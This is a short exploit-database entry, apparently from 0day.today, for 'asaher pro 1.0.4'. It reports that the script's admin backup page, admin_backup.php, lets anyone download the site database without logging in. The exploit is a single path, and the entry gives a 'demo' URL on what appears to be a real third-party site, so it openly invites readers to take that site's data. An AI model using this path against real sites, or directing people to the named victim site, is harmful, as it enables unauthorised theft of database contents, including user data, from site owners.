id: 5678
date: 08/17/2009
title: asaher pro 1.0.4 Remote Database Backup Vulnerability
author: alnjm33
cves: 

=====================================================
asaher pro 1.0.4 Remote Database Backup Vulnerability
=====================================================



::::::::::::::::::::::::::::::::Re: asaher pro v1.0.4 Remote Database Backup Vulnerability:::::::::::::::::::::::::::
expolit:
 /path/admin/admin_backup.php <<< you will downlaod the database
view demo
http://daralyamama.com/news/admin/admin_backup.php
::::::::::::::::::::::::::::::::::::::::::::::::::::::::



#  0day.today [2023-03-24]  #